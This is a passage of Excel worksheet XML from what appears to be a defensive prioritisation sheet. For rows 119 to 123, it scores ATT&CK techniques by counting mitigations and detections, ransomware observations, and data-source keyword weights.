        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.32</v>
      </c>
      <c r="AC119" s="29" t="s">
        <v>563</v>
      </c>
      <c r="AD119" s="25" t="str" cm="1">
        <f t="array" ref="AD119">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC119)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE119" s="25">
        <f>IF(AD119="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF119" s="25" t="str" cm="1">
        <f t="array" ref="AF119">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC119)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG119" s="25">
        <f>IF(AF119="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH119" s="25" t="str" cm="1">
        <f t="array" ref="AH119">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC119)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI119" s="25">
        <f>IF(AH119="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ119" s="25" t="str" cm="1">
        <f t="array" ref="AJ119">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC119)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK119" s="25">
        <f>IF(AJ119="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL119" s="25" t="str" cm="1">
        <f t="array" ref="AL119">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC119)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM119" s="25">
        <f>IF(AL119="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN119" s="61">
        <v>1</v>
      </c>
      <c r="AO119" s="51">
        <v>1</v>
      </c>
      <c r="AP119" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10489999999999999</v>
      </c>
      <c r="AQ119" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.23855555555555555</v>
      </c>
      <c r="AR119" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.23855555555555555</v>
      </c>
      <c r="AS119" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT119" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU11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20" spans="1:47" ht="32.1">
      <c r="A120" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.3333333333333337E-2</v>
      </c>
      <c r="B120" s="25">
        <f>SUM(H120,M120,V120)*(1+SUM(AE120,AG120,AI120,AK120,AM120))</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="C120" s="25" t="s">
        <v>564</v>
      </c>
      <c r="D120" s="25" t="s">
        <v>175</v>
      </c>
      <c r="E120" s="25" t="s">
        <v>565</v>
      </c>
      <c r="F120" s="51">
        <v>1</v>
      </c>
      <c r="G120" s="51">
        <v>1</v>
      </c>
      <c r="H120" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I120">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J120">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K120">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L120">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M120" s="25">
        <v>0</v>
      </c>
      <c r="N120" s="51">
        <v>2</v>
      </c>
      <c r="O120" s="51">
        <v>7</v>
      </c>
      <c r="P120" s="51">
        <v>0</v>
      </c>
      <c r="Q120" s="51">
        <v>6</v>
      </c>
      <c r="R120" s="52" t="s">
        <v>176</v>
      </c>
      <c r="S120" s="51">
        <v>17</v>
      </c>
      <c r="T120" s="51" t="s">
        <v>177</v>
      </c>
      <c r="U120" s="51">
        <v>21</v>
      </c>
      <c r="V120" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="W120">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>38</v>
      </c>
      <c r="X120">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="Y120">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="Z120">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>15</v>
      </c>
      <c r="AA120">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.15</v>
      </c>
      <c r="AB120">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.15</v>
      </c>
      <c r="AC120" s="29" t="s">
        <v>178</v>
      </c>
      <c r="AD120" s="25" t="str" cm="1">
        <f t="array" ref="AD120">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC120)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE120" s="25">
        <f>IF(AD120="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF120" s="25" t="str" cm="1">
        <f t="array" ref="AF120">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC120)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG120" s="25">
        <f>IF(AF120="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH120" s="25" t="str" cm="1">
        <f t="array" ref="AH120">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC120)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI120" s="25">
        <f>IF(AH120="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ120" s="25" t="str" cm="1">
        <f t="array" ref="AJ120">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC120)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK120" s="25">
        <f>IF(AJ120="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL120" s="25" t="str" cm="1">
        <f t="array" ref="AL120">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC120)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM120" s="25">
        <f>IF(AL120="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN120" s="60">
        <v>0</v>
      </c>
      <c r="AO120" s="51">
        <v>0</v>
      </c>
      <c r="AP120" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.3333333333333337E-2</v>
      </c>
      <c r="AQ120" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17777777777777778</v>
      </c>
      <c r="AR120" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17777777777777778</v>
      </c>
      <c r="AS120" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT120" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU12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21" spans="1:47" ht="63.95">
      <c r="A121" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14379428571428571</v>
      </c>
      <c r="B121" s="25">
        <f>SUM(H121,M121,V121)*(1+SUM(AE121,AG121,AI121,AK121,AM121))</f>
        <v>0.77127619047619045</v>
      </c>
      <c r="C121" s="25" t="s">
        <v>566</v>
      </c>
      <c r="D121" s="25" t="s">
        <v>88</v>
      </c>
      <c r="E121" s="25" t="s">
        <v>567</v>
      </c>
      <c r="F121" s="51">
        <v>1</v>
      </c>
      <c r="G121" s="51">
        <v>1</v>
      </c>
      <c r="H121" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I121">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J121">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K121">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L121">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M121" s="25">
        <v>0</v>
      </c>
      <c r="N121" s="51">
        <v>1</v>
      </c>
      <c r="O121" s="51">
        <v>17</v>
      </c>
      <c r="P121" s="51">
        <v>0</v>
      </c>
      <c r="Q121" s="51">
        <v>1</v>
      </c>
      <c r="R121" s="52" t="s">
        <v>568</v>
      </c>
      <c r="S121" s="51">
        <v>16</v>
      </c>
      <c r="T121" s="51" t="s">
        <v>569</v>
      </c>
      <c r="U121" s="51">
        <v>17</v>
      </c>
      <c r="V121" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.40476190476190477</v>
      </c>
      <c r="W121">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>33</v>
      </c>
      <c r="X121">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.6</v>
      </c>
      <c r="Y121">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.6</v>
      </c>
      <c r="Z121">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>19</v>
      </c>
      <c r="AA121">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.19</v>
      </c>
      <c r="AB121">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.19</v>
      </c>
      <c r="AC121" s="29" t="s">
        <v>570</v>
      </c>
      <c r="AD121" s="25" t="str" cm="1">
        <f t="array" ref="AD121">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC121)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE121" s="25">
        <f>IF(AD121="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF121" s="25" t="str" cm="1">
        <f t="array" ref="AF121">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC121)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG121" s="25">
        <f>IF(AF121="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH121" s="25" t="str" cm="1">
        <f t="array" ref="AH121">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC121)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI121" s="25">
        <f>IF(AH121="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ121" s="25" t="str" cm="1">
        <f t="array" ref="AJ121">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC121)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK121" s="25">
        <f>IF(AJ121="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL121" s="25" t="str" cm="1">
        <f t="array" ref="AL121">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC121)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM121" s="25">
        <f>IF(AL121="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN121" s="58">
        <v>2</v>
      </c>
      <c r="AO121" s="51">
        <v>1</v>
      </c>
      <c r="AP121" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14379428571428571</v>
      </c>
      <c r="AQ121" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.25709206349206348</v>
      </c>
      <c r="AR121" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.25709206349206348</v>
      </c>
      <c r="AS121" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT121" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU12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22" spans="1:47">
      <c r="A122" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.7133333333333323E-2</v>
      </c>
      <c r="B122" s="25">
        <f>SUM(H122,M122,V122)*(1+SUM(AE122,AG122,AI122,AK122,AM122))</f>
        <v>0.67133333333333334</v>
      </c>
      <c r="C122" s="25" t="s">
        <v>571</v>
      </c>
      <c r="D122" s="25" t="s">
        <v>197</v>
      </c>
      <c r="E122" s="25" t="s">
        <v>572</v>
      </c>
      <c r="F122" s="51">
        <v>1</v>
      </c>
      <c r="G122" s="51">
        <v>1</v>
      </c>
      <c r="H122" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I122">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J122">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K122">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L122">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M122" s="25">
        <v>0</v>
      </c>
      <c r="N122" s="51">
        <v>2</v>
      </c>
      <c r="O122" s="51">
        <v>12</v>
      </c>
      <c r="P122" s="51">
        <v>0</v>
      </c>
      <c r="Q122" s="51">
        <v>7</v>
      </c>
      <c r="R122" s="51" t="s">
        <v>573</v>
      </c>
      <c r="S122" s="51">
        <v>14</v>
      </c>
      <c r="T122" s="51" t="s">
        <v>574</v>
      </c>
      <c r="U122" s="51">
        <v>18</v>
      </c>
      <c r="V122" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.40476190476190477</v>
      </c>
      <c r="W122">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X122">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y122">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z122">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>21</v>
      </c>
      <c r="AA122">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.21</v>
      </c>
      <c r="AB122">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.21</v>
      </c>
      <c r="AC122" s="29" t="s">
        <v>399</v>
      </c>
      <c r="AD122" s="25" t="str" cm="1">
        <f t="array" ref="AD122">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC122)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE122" s="25">
        <f>IF(AD122="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF122" s="25" t="str" cm="1">
        <f t="array" ref="AF122">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC122)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG122" s="25">
        <f>IF(AF122="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH122" s="25" t="str" cm="1">
        <f t="array" ref="AH122">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC122)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI122" s="25">
        <f>IF(AH122="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ122" s="25" t="str" cm="1">
        <f t="array" ref="AJ122">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC122)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK122" s="25">
        <f>IF(AJ122="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL122" s="25" t="str" cm="1">
        <f t="array" ref="AL122">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC122)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM122" s="25">
        <f>IF(AL122="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN122" s="62">
        <v>0</v>
      </c>
      <c r="AO122" s="51">
        <v>0</v>
      </c>
      <c r="AP122" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.7133333333333323E-2</v>
      </c>
      <c r="AQ122" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.22377777777777777</v>
      </c>
      <c r="AR122" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.22377777777777777</v>
      </c>
      <c r="AS122" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT122" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU12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23" spans="1:47" ht="48">
      <c r="A123" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.7133333333333323E-2</v>
      </c>
      <c r="B123" s="25">
        <f>SUM(H123,M123,V123)*(1+SUM(AE123,AG123,AI123,AK123,AM123))</f>
        <v>0.67133333333333334</v>
      </c>
      <c r="C123" s="25" t="s">
        <v>575</v>
      </c>
      <c r="D123" s="25" t="s">
        <v>460</v>
      </c>
      <c r="E123" s="25" t="s">
        <v>576</v>
      </c>
      <c r="F123" s="51">
        <v>1</v>
      </c>
      <c r="G123" s="51">
        <v>1</v>
      </c>
      <c r="H123" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I123">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J123">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K123">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L123">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M123" s="25">
        <v>0</v>
      </c>
      <c r="N123" s="51">
        <v>0</v>
      </c>
      <c r="O123" s="51">
        <v>0</v>
      </c>
      <c r="P123" s="51">
        <v>0</v>
      </c>
      <c r="Q123" s="51">
        <v>1</v>
      </c>
      <c r="R123" s="52" t="s">
        <v>577</v>
      </c>
      <c r="S123" s="51">
        <v>18</v>
      </c>
      <c r="T123" s="52" t="s">
        <v>578</v>
      </c>
      <c r="U123" s="51">
        <v>24</v>
      </c>
      <c r="V123" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.40476190476190477</v>
      </c>
      <c r="W123">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>42</v>
      </c>
      <c r="X123">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.76363636363636367</v>
      </c>
      <c r="Y123">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.76363636363636367</v>
      </c>
      <c r="Z123">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA123">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB123">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC123" s="29" t="s">
        <v>579</v>
      </c>
      <c r="AD123" s="25" t="str" cm="1">
        <f t="array" ref="AD123">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC123)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE123" s="25">
        <f>IF(AD123="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF123" s="25" t="str" cm="1">
        <f t="array" ref="AF123">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC123)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG123" s="25">
        <f>IF(AF123="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH123" s="25" t="str" cm="1">
        <f t="array" ref="AH123">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC123)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI123" s="25">
        <f>IF(AH123="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ123" s="25" t="str" cm="1">
        <f t="array" ref="AJ123">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC123)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK123" s="25">
        <f>IF(AJ123="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL123" s="25" t="str" cm="1">
        <f t="array" ref="AL123">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC123)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM123" s="25">
